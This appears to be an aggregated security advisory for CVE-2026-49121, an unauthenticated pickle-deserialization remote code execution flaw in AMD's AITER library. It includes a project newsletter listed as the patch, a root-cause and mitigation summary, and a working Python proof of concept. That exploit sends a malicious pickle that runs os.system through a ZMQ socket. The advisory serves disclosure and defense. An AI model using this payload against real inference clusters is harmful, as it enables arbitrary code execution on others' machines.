VYPR
High severity8.1NVD Advisory· Published Jun 1, 2026

CVE-2026-49121

CVE-2026-49121

Description

AI Tensor Engine for ROCm (AITER) through 0.1.14 contains an unauthenticated remote code execution vulnerability in the MessageQueue.recv() function within shm_broadcast.py that allows unauthenticated remote attackers to execute arbitrary code by sending a malicious pickle payload to a ZMQ SUB socket with no authentication, HMAC, or format validation. Attackers who can reach the writer XPUB endpoint on the cluster network or supply a forged Handle with an attacker-controlled remote_subscribe_addr can deliver a crafted pickle payload that executes arbitrary code simultaneously as the inference worker process on every remote reader worker.

Affected products

1

Patches

1
8d47409af7ec

docs: add AITER May 2026 newsletter (#3170)

https://github.com/ROCm/aiterPengMay 14, 2026via nvd-ref
1 file changed · +170 0
  • docs/newsletter/2026-05.md+170 0 added
    @@ -0,0 +1,170 @@
    +# AITER Newsletter — May 2026
    +
    +**Period covered:** April 14 – May 13, 2026
    +
    +[AITER](https://github.com/ROCm/aiter) is AMD's open-source AI Tensor Engine for ROCm: a kernel and primitive library for inference and training acceleration on Instinct GPUs (MI300X, MI308, MI325X, MI355X) and Radeon RDNA4/RDNA5. AITER is consumed downstream by vLLM, SGLang, ATOM, and PyTorch ROCm.
    +
    +This is the first issue of a monthly newsletter. Goal: keep our partners current on what's landed in `main`, what's been released, and what's coming. Feedback welcome via [GitHub Issues](https://github.com/ROCm/aiter/issues).
    +
    +## TL;DR
    +
    +- **221 commits** to `main`, **37 contributors**, ~50 commits/week steady-state.
    +- **2 official releases shipped:** v0.1.12.post2 (Apr 23) and v0.1.13 (May 9). v0.1.14 in RC.
    +- **DeepSeek-V4 enablement** is the dominant cross-cutting theme: fused kernels, tuned configs, A8W4 MoE, MLA improvements landing in waves.
    +- **MoE kernel family expanded:** new int4 path for Kimi-K2.5, A8W4 for DSv4, MXFP4 alignment, swiglu A4W4 for GPT-OSS, ASM fmoe for gfx950.
    +- **Architecture footprint widened:** gfx950 (MI355X) maturing in production, gfx1201 (RDNA4) FlashAttention backend landed, gfx1250 (MI450) early enablement via FlyDSL 0.1.7.
    +- **Release engineering tightened:** 6-wheel manylinux_2_28 matrix per release with strict torch ABI pinning.
    +
    +## How to Use AITER
    +
    +Public manylinux wheels are published with each release for ROCm 7.0 / 7.1 / 7.2 × Python 3.10 / 3.12, fat-binary across `gfx942` (MI300/MI308/MI325X) and `gfx950` (MI355X):
    +
    +```bash
    +pip install aiter --extra-index-url https://download.pytorch.org/whl/rocm7.2
    +```
    +
    +Or download release artifacts directly: [github.com/ROCm/aiter/releases](https://github.com/ROCm/aiter/releases).
    +
    +Build from source: see [BUILD.md](https://github.com/ROCm/aiter/blob/main/BUILD.md). Submodule init is required (`git submodule update --init --recursive`).
    +
    +## Releases Shipped This Period
    +
    +| Version | Date | Highlights |
    +|---|---|---|
    +| v0.1.12.post2 | 2026-04-23 | Critical CK MoE multi-arch dispatch fix (#2645), workflow `torch_pin` support (#2875) |
    +| v0.1.13-rc1 → rc5 | 2026-04-25 → 2026-05-08 | Five RC iterations covering preshuffle layouts, MLA fixes, ASM fmoe kernels |
    +| v0.1.13 | 2026-05-09 | Production release. New ASM fmoe kernels for gfx950 (off by default, opt-in via `AITER_XBFLOAT16=1`) |
    +
    +## Highlights by Area
    +
    +### DeepSeek-V4 Enablement
    +
    +DSv4 is now the largest cross-cutting workstream in AITER. Coverage spans Triton, ATOM integration, FlyDSL kernels, and tuned GEMM/FMoE configs.
    +
    +- **DSV4 fusions phase 1** ([#3057](https://github.com/ROCm/aiter/pull/3057)): `fused_reduce_q_norm_qk_rope_swa_write` and `fused_clamp_act_mul_quant`, integrated end-to-end in ATOM.
    +- **DSv4-Pro BF16 tuned GEMM** ([#3113](https://github.com/ROCm/aiter/pull/3113)): no-hipblaslt path.
    +- **DSv4-Pro A8W8 blockscale tuned configs** ([#3108](https://github.com/ROCm/aiter/pull/3108)).
    +- **A8W4 MoE FlyDSL path for DSv4** ([#2951](https://github.com/ROCm/aiter/pull/2951)).
    +- **Fused rope + rotate_activation + fp4_quant_inplace** ([#3035](https://github.com/ROCm/aiter/pull/3035)): single-pass DSv4 prologue.
    +- **Bulk merge of tuned configs** ([#3004](https://github.com/ROCm/aiter/pull/3004) + [#3024](https://github.com/ROCm/aiter/pull/3024)): GLM-4.7, Kimi-K2.5, MiniMax-M2.5, DeepSeek-V3.2 GEMM and FMoE.
    +
    +### MoE Kernel Family
    +
    +Significant diversification of MoE precision and quantization paths.
    +
    +- **Kimi-K2.5 a16wi4 MoE** ([#2863](https://github.com/ROCm/aiter/pull/2863)): bf16 activations × packed int4 weights with per-1×32 bf16 groupwise scale. New FlyDSL `int4_bf16` stage1/stage2 kernels and fused `swiglu_and_mul`.
    +- **MXFP4 fused quant path alignment** ([#3123](https://github.com/ROCm/aiter/pull/3123)): consistent semantics across A4W4 paths.
    +- **MXFP4 quantize kernel** ([#2976](https://github.com/ROCm/aiter/pull/2976)): standalone primitive for upstream quantization pipelines.
    +- **GPT-OSS swiglu A4W4 path** ([#2972](https://github.com/ROCm/aiter/pull/2972)): enables GPT-OSS on A4W4 hardware.
    +- **ASM fmoe kernels for gfx950** ([#2262](https://github.com/ROCm/aiter/pull/2262)): bypass bf16→fp8 quantization. Triple-gated behind `AITER_XBFLOAT16=1` env var, gfx950 only, `per_1×128` quant only. Opt-in for safety in this release line.
    +- **Top-k optimizations**: radix top-k for MI308/MI355X ([#3087](https://github.com/ROCm/aiter/pull/3087)), sigmoid/softmax `topk_gating` ([#3100](https://github.com/ROCm/aiter/pull/3100)), Triton fused topk ([#3096](https://github.com/ROCm/aiter/pull/3096)).
    +- **GPT-OSS MoE TP2/TP8 tuned configs** ([#3140](https://github.com/ROCm/aiter/pull/3140)).
    +
    +### MLA / Multi-head Latent Attention
    +
    +- **HK MLA: MI35X m16x8 retune + new m16x4 kernel + page_size + mask support** ([#3072](https://github.com/ROCm/aiter/pull/3072)).
    +- **MI350 MLA ps mode bf16**: `nhead64,1` routed to `m16x4`, no folding ([#3063](https://github.com/ROCm/aiter/pull/3063)).
    +- **gfx950 ASM PA non-persistent decode crash on `nhead=32` fixed** ([#2983](https://github.com/ROCm/aiter/pull/2983)).
    +- **FP8 MLA decode kernel for `sub_kv=64, sub_qh=8`** ([#3014](https://github.com/ROCm/aiter/pull/3014)): for `gqa_ratio=8, qseqlen=1` workloads.
    +
    +### FMHA / Attention
    +
    +- **F8 FMHA ASM gfx950** ([#2911](https://github.com/ROCm/aiter/pull/2911)): production-grade FMHA on MI355X.
    +- **`batch_prefill` OOB page table read fix with regression tests** ([#3032](https://github.com/ROCm/aiter/pull/3032)).
    +- **rope OOB under concurrent scenarios** ([#3078](https://github.com/ROCm/aiter/pull/3078)).
    +- **dsink bf16 noise in Triton MHA backward** ([#3070](https://github.com/ROCm/aiter/pull/3070)).
    +- **`fused_qk_rmsnorm_per_token_quant` kernel** ([#2958](https://github.com/ROCm/aiter/pull/2958)): new fused primitive.
    +- **Manifold-constrained Hyper Connection (mHC-pre)** ([#2646](https://github.com/ROCm/aiter/pull/2646)): research path enabled in Triton.
    +
    +### Architecture Expansion
    +
    +- **gfx950 (MI355X)** — maturing across MoE, MLA, and FMHA. Now the primary production target alongside gfx942.
    +- **gfx1201 (RDNA4)** — FlyDSL `flash_attn_func` backend landed in v0.1.13. First RDNA4-class attention backend in AITER.
    +- **gfx1250 (MI450)** — FlyDSL 0.1.7 adds early gfx1250 support ([#3121](https://github.com/ROCm/aiter/pull/3121)). Pre-silicon enablement track.
    +- **gfx942 (MI300/MI308/MI325X)** — continued tuning, e.g. dsv3 blockscale GEMM config in MI300 ([#2881](https://github.com/ROCm/aiter/pull/2881)).
    +
    +### FlyDSL
    +
    +FlyDSL is AITER's emerging in-house DSL for high-performance kernels, providing a path that complements Composable Kernel (CK).
    +
    +- Version progression: 0.1.4 → 0.1.5 → 0.1.6 → 0.1.7 over the period.
    +- **gfx1250 support** ([#3121](https://github.com/ROCm/aiter/pull/3121)).
    +- **GDR decode indexing fix** ([#3125](https://github.com/ROCm/aiter/pull/3125)).
    +- **`fly_values` import compatibility fix** ([#3141](https://github.com/ROCm/aiter/pull/3141)).
    +- New kernel families: int4 MoE, A8W4 MoE, `swiglu_and_mul`, MXScale FP8/A8W4 GEMM.
    +
    +### Notable Bug Fixes
    +
    +- **CK MoE multi-arch dispatch silent wrong-kernel** ([#2645](https://github.com/ROCm/aiter/pull/2645)) — shipped in v0.1.12.post2. Affected anyone with a multi-arch fat binary.
    +- **CK MoE split-k buffer dispatch** ([#3050](https://github.com/ROCm/aiter/pull/3050)) — wrong buffer size on identity vs equality compare.
    +- **Address overflow in tile dispatch** ([#3124](https://github.com/ROCm/aiter/pull/3124)).
    +- **`cp_gather_indexer_k_cache` indexing** ([#2954](https://github.com/ROCm/aiter/pull/2954)).
    +- **GLM-5 GEMM bf16 8192×2048 retune** ([#3101](https://github.com/ROCm/aiter/pull/3101)) — accuracy regression resolution.
    +
    +### Downstream Integrations
    +
    +- **vLLM v0.19.1**: torch ABI pinning matrix per ROCm version (7.0 → torch 2.10, 7.1 → torch 2.10, 7.2 → torch 2.11). Verified against MI355X.
    +- **SGLang AMD aiter CI branch** ([#3120](https://github.com/ROCm/aiter/pull/3120)): downstream SGLang now runs on a dedicated AMD aiter branch in CI for predictable integration.
    +- **ATOM 0.1.2.post**: tracks AITER releases. v0.1.13 validated against ATOM serving via lm-eval gsm8k 3-shot.
    +- **PyTorch wheels**: AITER wheels available on `download.pytorch.org/whl/rocm{7.0,7.1,7.2}` via PyTorch's manylinux2_28 builder images.
    +
    +### Release Engineering
    +
    +- **6-wheel matrix per release**: ROCm 7.0 / 7.1 / 7.2 × Python 3.10 / 3.12, manylinux_2_28 ABI, fat binary `gfx942;gfx950`.
    +- **Strict torch ABI pinning** via the `torch_pin` workflow input. Avoids the recurring `c10::cuda` undefined-symbol class of failures when wheels are mixed with mismatched torch builds.
    +- **CI prebuilt kernel reuse** ([#3143](https://github.com/ROCm/aiter/pull/3143)): cuts test wall time.
    +- **Auto-update split-test FILE_TIMES** ([#2918](https://github.com/ROCm/aiter/pull/2918)): keeps shard balance current.
    +- **Known issues now tracked in release notes** when material to consumers (e.g. [#3076](https://github.com/ROCm/aiter/issues/3076), [#3062](https://github.com/ROCm/aiter/issues/3062)).
    +
    +## Validation Reference
    +
    +GSM8K 3-shot, flexible-extract, MI355X, on ATOM serving:
    +
    +| Model | v0.1.13 Score | Threshold |
    +|---|---|---|
    +| DeepSeek-R1-0528 | 0.9454 | 0.94 |
    +| MiniMax-M2.5 | 0.9295 | 0.92 |
    +| Qwen3-235B-FP8 | 0.8802 | 0.87 |
    +
    +## What's Coming
    +
    +### v0.1.14 (target this week)
    +
    +- Cumulative changes since v0.1.13 (141 commits).
    +- DSv4 fusions phase 1 in baseline, plus DSv4-Pro tuned GEMM.
    +- HK MLA retune for MI35X.
    +- `batch_prefill` OOB fix.
    +- 6-wheel matrix shipped, accuracy validation gating.
    +
    +### v0.1.13.post1 (in next 1–2 days)
    +
    +- Adds Kimi-K2.5 a16wi4 MoE ([#2863](https://github.com/ROCm/aiter/pull/2863)) + splitk fix ([#3050](https://github.com/ROCm/aiter/pull/3050)) on top of v0.1.13, for partners needing the int4 MoE path on the v0.1.13 line.
    +
    +### Beyond v0.1.14
    +
    +- DSv4 fusions phase 2.
    +- MORI v1.2.0 first release.
    +- Continued gfx1250 enablement as silicon matures.
    +- Continued FlyDSL kernel coverage expansion.
    +
    +## Known Issues Carrying
    +
    +- **[#3076](https://github.com/ROCm/aiter/issues/3076)** — `aiter/dist/shm_broadcast.py` uses `pickle.loads` on a TCP-bound ZMQ XPUB. Pre-existing since v0.1.12. Mitigation: bind to loopback only or front the broadcast socket with a firewall.
    +- **[#3062](https://github.com/ROCm/aiter/issues/3062)** — gfx950 ASM paged-attention `block_id` truncates at the 16-bit / 65,536-block (~2 GB) boundary. Pre-existing. Mitigation: route pure-MHA layers to the Triton/Gluon paged-attention path.
    +
    +Both will be addressed in v0.1.14 or a follow-up post-release.
    +
    +## Get Involved
    +
    +- **Repo:** [github.com/ROCm/aiter](https://github.com/ROCm/aiter)
    +- **Releases & wheels:** [github.com/ROCm/aiter/releases](https://github.com/ROCm/aiter/releases)
    +- **File issues / requests:** [GitHub Issues](https://github.com/ROCm/aiter/issues). Tag with `[request]` prefix for kernel/config tune requests.
    +- **Pull requests welcome.** See [CONTRIBUTING.md](https://github.com/ROCm/aiter/blob/main/CONTRIBUTE.md) for how to land changes.
    +
    +## Contributor Acknowledgments
    +
    +37 unique contributors landed code in `main` over the past month. Top contributors by commit count: Xin Huang, yzhou103, Peng Sun, la, XiaobingZhang, Lingpeng Jin, Nidal Danial, amd-ruitang3, Sergey Solovyev, lalala-sh, Elton, Yutao Xu, Pleaplusone, JaxChen29, Felix Li, and many more. Thanks to everyone shipping kernels, fixes, and tuned configs.
    +
    +---
    +
    +*Newsletter compiled by the AMD AI Software Engineering team. Next issue: mid-June 2026.*
    

Vulnerability mechanics

Root cause

"The MessageQueue.recv() function deserializes untrusted data using pickle.loads() without proper validation."

Attack vector

An unauthenticated attacker can reach the writer XPUB endpoint on the cluster network or supply a forged Handle with an attacker-controlled remote_subscribe_addr. By sending a malicious pickle payload to a ZMQ SUB socket, the attacker can execute arbitrary code simultaneously as the inference worker process on every remote reader worker [ref_id=1]. This is possible because the socket has no authentication, HMAC, or format validation [ref_id=1].

Affected code

The vulnerability lies within the MessageQueue.recv() function in shm_broadcast.py, specifically at the line `return pickle.loads(recv.buffer)` [ref_id=1]. This function is called by MessageQueue.dequeue() when the reader is a remote reader, utilizing a SUB socket connected to the writer's XPUB socket which is bound to the host network [ref_id=1].

What the fix does

The advisory suggests replacing pickle with a safer serializer like msgpack or safetensors for control-plane metadata and tensor buffers. Alternatively, if pickle must be retained, a per-frame HMAC-SHA256 tag derived from a shared cluster secret should be prepended, with frames failing verification rejected before deserialization. The advisory also recommends restricting the XPUB bind address to localhost for single-host deployments and requiring explicit opt-in for multi-host configurations with a warning [ref_id=1].

Preconditions

  • networkAttacker must be able to reach the writer XPUB endpoint on the cluster network.
  • inputAttacker must be able to supply a forged Handle with an attacker-controlled remote_subscribe_addr.

Reproduction

```python #!/usr/bin/env python3 import os, pickle, sys, threading, time import zmq

PROOF_FILE = "/tmp/aiter-shm-pwned" sys.path.insert(0, os.path.join(os.path.dirname(os.path.abspath(__file__)), "../../source_audit/aiter"))

from aiter.dist.shm_broadcast import MessageQueue, Handle

class RCEPayload: def __reduce__(self): return (os.system, (f"id > {PROOF_FILE} && hostname >> {PROOF_FILE}",))

def _victim(addr): time.sleep(0.3) handle = Handle(local_reader_ranks=[], remote_subscribe_addr=addr) mq = MessageQueue.create_from_handle(handle, rank=99) try: mq.dequeue(timeout=10.0) except Exception: pass

if __name__ == "__main__": if os.path.exists(PROOF_FILE): os.unlink(PROOF_FILE)

ctx = zmq.Context() pub = ctx.socket(zmq.XPUB) port = pub.bind_to_random_port("tcp://127.0.0.1")

t = threading.Thread(target=_victim, args=(f"tcp://127.0.0.1:{port}",), daemon=True) t.start()

pub.setsockopt(zmq.RCVTIMEO, 3000) try: pub.recv() # wait for SUB subscription from victim except zmq.Again: pass

pub.send(pickle.dumps(RCEPayload()))

t.join(timeout=10) pub.close(); ctx.term()

if os.path.exists(PROOF_FILE): print(f"[+] RCE confirmed: {open(PROOF_FILE).read().strip()}") else: print("[-] failed") ``` [ref_id=1]

Generated on Jun 1, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

3

News mentions

0

No linked articles in our index yet.